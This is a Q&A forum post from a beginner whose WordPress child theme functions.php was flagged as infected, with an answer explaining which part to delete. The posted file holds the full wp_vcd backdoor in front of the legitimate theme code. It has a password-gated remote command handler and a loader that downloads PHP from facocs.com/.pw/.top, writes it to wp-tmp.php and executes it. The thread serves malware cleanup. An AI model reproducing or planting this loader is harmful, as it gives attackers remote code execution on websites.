# Help with find a bit of code to move from functions.php

Tags: php

I have been told that the code below contains malware and this is what the hosting guys sent me. But I do not know where this would be or what it means. I am a beginner so apologies if it sounds dumb.

> functions.php
>   /home/sites/3a/e/e806688333/public_html/wp-content/themes/listify/functions.php
>   generic. file.get.contents.0

```
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd73f3077ba6aca159219759cddb58d11'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {






                case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {

                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                                case 'change_code';
                    if (isset($_REQUEST['newcode']))
                        {

                            if (!empty($_REQUEST['newcode']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }

        die("");
    }








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


$wp_auth_key='0bb00640fa54049fc4c2c5e080f9f51a';
        if (($tmpcontent = @file_get_contents("http://www.facocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.facocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


        elseif ($tmpcontent = @file_get_contents("http://www.facocs.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        } 

                elseif ($tmpcontent = @file_get_contents("http://www.facocs.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));

        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 





    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?><?php
/**
 * Listify child theme.
 */

// Gogout page redirect to homepage

add_action('wp_logout','go_home');
function go_home(){
    wp_redirect( home_url() );
    exit();
}

// Fin

function listify_child_styles() {
    wp_enqueue_style( 'listify-child', get_stylesheet_uri() );
}

add_action( 'wp_enqueue_scripts', 'listify_child_styles', 999 );

/** Place any new code below this line */

// Code for city img

    function custom_listify_cover_image( $image, $args ) {
    if ( ! isset( $args[ 'term' ] ) ) {
        return $image;
    }

    $term = $args[ 'term' ];
    /**
     * Only edit the URL here.
     *
     * Do not add the name of the image to this URL.
     *
     * Once the URL is set upload images to your web server's directory with the name
     * of each of your terms slug.
     *
     * Example:
     *   Restaurants = http://yourwebsite.com/images/directory/restaurants.jpg
     */
    $url = '/pics/';

    $image = array( $url . $term->slug . '.jpg' );

    return $image;
}
add_filter( 'listify_cover_image', 'custom_listify_cover_image', 10, 2 );

 /**
 * Limit Photo Uploads to Listing Owner
 */
    function limit_who_can_upload($can) {
    global $post;

    if ( $post->post_author == get_current_user_id() ) {
        return $can;
    }

    return false;
}
add_filter( 'listify_can_upload_to_listing','limit_who_can_upload' );


/**
 * Listify - Default Image for Listings
 */
function custom_default_listify_cover_image( $image, $args ) {
    global $post;

    if ( $image ) {
        return $image;
    }

    $image = array( '/pics/cover.jpg' );

    return $image;
}
add_filter( 'listify_cover_image', 'custom_default_listify_cover_image', 10, 2 );





/**
 * Listify - Faire fonctionner l'adresse en Espagne (Andalousie)
*/


function custom_address_data( $address, $geocoded_address ) {
    $address_data = $geocoded_address->results[0]->address_components;

    foreach ( $address_data as $data ) {
        switch ( $data->types[0] ) {
            case 'administrative_area_level_2' :
                $address[ 'administrative_area_level_2' ] = sanitize_text_field( $data->long_name );
            break;
        }
    }

    return $address;
}
add_filter( 'job_manager_geolocation_get_location_data', 'custom_address_data', 10, 2 );

function custom_address_replacements( $replacements, $args ) {
    $administrative_area_level_2 = isset( $args[ 'administrative_area_level_2' ] ) && '' != $args[ 'administrative_area_level_2' ] ? $args[ 'administrative_area_level_2' ] : false;
    $replacements[ '{administrative_area_level_2}' ] = $administrative_area_level_2;

    return $replacements;
}
add_filter( 'woocommerce_formatted_address_replacements', 'custom_address_replacements', 10, 2 );

function custom_formatted_address( $parts ) {
    global $post;

    $parts[ 'administrative_area_level_2' ] = $post->geolocation_administrative_area_level_2;

    return $parts;
}
add_filter( 'listify_formatted_address', 'custom_formatted_address' );

function custom_address_formats_shim( $formats ) {
    $es = $formats[ 'ES' ];
    $formats[ 'ES' ] = str_replace( '{state}', '{administrative_area_level_2}', $es );

    return $formats;
}
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats_shim', 90 );

/**
 * Faire fonctionner l'adresse en Espagne (Andalousie)
*/

function custom_address_formats( $formats ) {
    $formats[ 'ES' ]  = "{address_1}\n{address_2}\n{postcode} - {city}\n{administrative_area_level_2} (Spain)";

    return $formats;
}
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats', 20 );



/**
 * Enlever les notifications de wordpress et Plugin
*/

global $user_login;
get_currentuserinfo();
if (!current_user_can('update_plugins')) { // checks to see if current user can update plugins
add_action( 'init', create_function( '$a', "remove_action( 'init', 'wp_version_check' );" ), 2 );
add_filter( 'pre_option_update_core', create_function( '$a', "return null;" ) );
}

////////////////////////////////////////////////////////////////////////
// BuddyPress Profile URL Integration //////////////////////////////////
////////////////////////////////////////////////////////////////////////
add_filter('wpdiscuz_profile_url', 'wpdiscuz_bp_profile_url', 10, 2);
function wpdiscuz_bp_profile_url($profile_url, $user) {
    if ($user && class_exists('BuddyPress')) {
        $profile_url = bp_core_get_user_domain($user->ID);
    }
    return $profile_url;
}//

//Remove WooCommerce's annoying update message
remove_action( 'admin_notices', 'woothemes_updater_notice' );

//Able shortcode on job description
add_filter( 'the_job_description', 'do_shortcode' );
```

Comment: Download the theme again and replace the files. But if you've been hacked, it is possible that other things happened to your website as well - it is best to consult an expert that will help you through this

Answer (score 0):

Everything before this is malware:

```
<?php
/**
 * Listify child theme.
 */
```

Delete *everything* before that, including the `?>` in front of it.

Keep in mind that if someone got access to add this code, then they could've done a lot more. Follow all the steps in the codex: https://codex.wordpress.org/FAQ_My_site_was_hacked